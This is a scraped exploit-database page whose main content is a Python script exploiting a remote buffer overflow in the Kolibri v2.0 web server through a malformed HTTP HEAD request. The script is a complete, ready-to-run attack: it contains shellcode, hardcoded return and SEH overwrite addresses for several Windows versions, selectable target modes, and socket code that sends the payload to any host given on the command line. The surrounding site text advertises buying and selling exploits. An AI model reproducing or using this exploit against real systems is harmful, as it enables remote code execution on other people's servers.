0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Kolibri v2.0 Buffer Overflow RET + SEH exploit (HEAD)
#!/usr/bin/env python # _ ____ __ __ ___ # (_)____ _ __/ __ \/ /_____ ____/ / _/_/ | # / // __ \ | / / / / / //_/ _ \/ __ / / / / / # / // / / / |/ / /_/ / ,< / __/ /_/ / / / / / # /_//_/ /_/|___/\____/_/|_|\___/\__,_/ / /_/_/ # Live by the byte |_/_/ # # Members: # # Pr0T3cT10n # -=M.o.B.=- # TheLeader (gsog2009 [a7] homtail [d0t] com) # Sro # Debug # # Contact: inv0ked.israel@gmail.com # # ----------------------------------- # Bug discovered by Pr0T3cT10n # Exploited by TheLeader, Debug # ----------------------------------- # Description: # # Kolibri v2.0 is vulnerable to a remote buffer overflow attack. # By sending a malformed HEAD request, we are able to overwrite both the return address and an SEH handler. # Null bytes terminate the request though, but we are able to partially overwrite with a pointer to # a POP + POP + RET instruction inside kolibri.exe and gain control over the execution via SEH. # This although gets complicated because the SEH handler offset between XP/2K3 and Vista/W7 is different # by 2 bytes (probably due to local stack variables), thus we are able to cover only 2 operating system with the SEH overwrite exploit. # # In order to successfully exploit the RET overwrite, we need to either overwrite ret with jmp to the stack # and then overwrite the stack with our shellcode, or find another way to get to our shellcode. Since null # terminates the request string, it is impossible to pratially overwrite RET with an address from the binary # and then overwrite with shellcode. We attempted finding another reliable way to get to our shellcode but haven't succeeded. # The most reasonable option left is to overwrite RET with an OS specific address from a DLL that gets loaded by Kolibri. # ----------------------------------- # # Exploit Title: Kolibri v2.0 Buffer Overflow RET + SEH exploit (HEAD) # Date: 24/12/2010 # Author: TheLeader # Affected Version: Kolibri-2.0 # Tested on: Windows 7 x86 ENG/HEB , Windows Server 2003 SP2 ENG, Windows XP SP3 ENG # ISRAEL, NULLBYTE.ORG.IL import socket import sys print "\n Kolibri v2.0 Buffer Overflow RET + SEH exploit" usage = ( " Usage: kexploit.py host port [mode]\n\n" " Modes:\n" " 1 - RET = XP SP3 ENG, SEH = VISTA + WIN7 (default)\n" " 2 - RET = SERVER2003 SP2 ENG, SEH = VISTA + WIN7\n" " 3 - RET = XP SP3 ENG, SEH = XP + SERVER2003\n" " 4 - RET = SERVER2003 SP2 ENG, SEH = XP + SERVER2003\n" ) if len(sys.argv) < 3: print usage sys.exit(0) host = sys.argv[1] try: port = int(sys.argv[2]) except ValueError: print " [-] Error: port must be numeric!" sys.exit(1) if len(sys.argv) > 3: try: mode = int(sys.argv[3]) except ValueError: print " [-] Error: mode must be numeric!" sys.exit(1) else: mode = 1 # ret offsets = 213, 515 ret_offset = 515 seh_offset_xp_2k3 = 792 # WINXP / WS2K3 seh_offset_vista_7 = 794 # VISTA / WIN7 # badchars = [0x00, 0x0d, 0x0a, 0x20, 0x3d, 0x3f] shellcode = ( "\xb8\xe2\x96\x27\xb0\x33\xc9\xda\xde\xd9\x74\x24\xf4\x5b" "\xb1\x32\x31\x43\x10\x83\xeb\xfc\x03\xa1\x9a\xc5\x45\xd9" "\x4b\x80\xa6\x21\x8c\xf3\x2f\xc4\xbd\x21\x4b\x8d\xec\xf5" "\x1f\xc3\x1c\x7d\x4d\xf7\x97\xf3\x5a\xf8\x10\xb9\xbc\x37" "\xa0\x0f\x01\x9b\x62\x11\xfd\xe1\xb6\xf1\x3c\x2a\xcb\xf0" "\x79\x56\x24\xa0\xd2\x1d\x97\x55\x56\x63\x24\x57\xb8\xe8" "\x14\x2f\xbd\x2e\xe0\x85\xbc\x7e\x59\x91\xf7\x66\xd1\xfd" "\x27\x97\x36\x1e\x1b\xde\x33\xd5\xef\xe1\x95\x27\x0f\xd0" "\xd9\xe4\x2e\xdd\xd7\xf5\x77\xd9\x07\x80\x83\x1a\xb5\x93" "\x57\x61\x61\x11\x4a\xc1\xe2\x81\xae\xf0\x27\x57\x24\xfe" "\x8c\x13\x62\xe2\x13\xf7\x18\x1e\x9f\xf6\xce\x97\xdb\xdc" "\xca\xfc\xb8\x7d\x4a\x58\x6e\x81\x8c\x04\xcf\x27\xc6\xa6" "\x04\x51\x85\xac\xdb\xd3\xb3\x89\xdc\xeb\xbb\xb9\xb4\xda" "\x30\x56\xc2\xe2\x92\x13\x3c\xa9\xbf\x35\xd5\x74\x2a\x04" "\xb8\x86\x80\x4a\xc5\x04\x21\x32\x32\x14\x40\x37\x7e\x92" "\xb8\x45\xef\x77\xbf\xfa\x10\x52\xdc\x9d\x82\x3e\x23") ret_xp_sp3 = "\x13\x44\x87\x7C" # 0x7C874413 WINXP SP3 JMP ESP @ kernel32.dll ret_2k3_sp2 = "\xC3\x3B\xF7\x76" # 0x76F73BC3 WS2K3 SP2 JMP ESP @ winrnr.dll if mode == 1: ret = ret_xp_sp3 seh_offset = seh_offset_vista_7 elif mode == 2: ret = ret_2k3_sp2 seh_offset = seh_offset_vista_7 elif mode == 3: ret = ret_xp_sp3 seh_offset = seh_offset_xp_2k3 elif mode == 4: ret = ret = ret_2k3_sp2 seh_offset = seh_offset_xp_2k3 seh = "\x67\x1a\x48" # 0x0045586B @ kolibri.exe POP + POP + RET nseh="\x90\x90\xeb\xf7" jmp_back2 = "\xE9\x12\xFF\xFF\xFF" buf = "\x41" * (ret_offset) nops = "\x90" * (seh_offset - len(buf + ret + shellcode + jmp_back2 + nseh)) req = ("HEAD /" + buf + ret + nops + shellcode + jmp_back2 + nseh + seh + " HTTP/1.1\r\n" "Host: " + host + ":" + str(port) + "\r\n" "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: he,en-us;q=0.7,en;q=0.3\r\n" "Accept-Encoding: gzip,deflate\r\n" "Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7\r\n" "Keep-Alive: 115\r\n" "Connection: keep-alive\r\n\r\n") print " [+] Connecting to %s:%d" % (host, port) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print " [+] Sending payload.." s.send(req) data = s.recv(1024) print " [+] Closing connection.." s.close() print " [+] Done!" # 0day.today [2024-12-25] #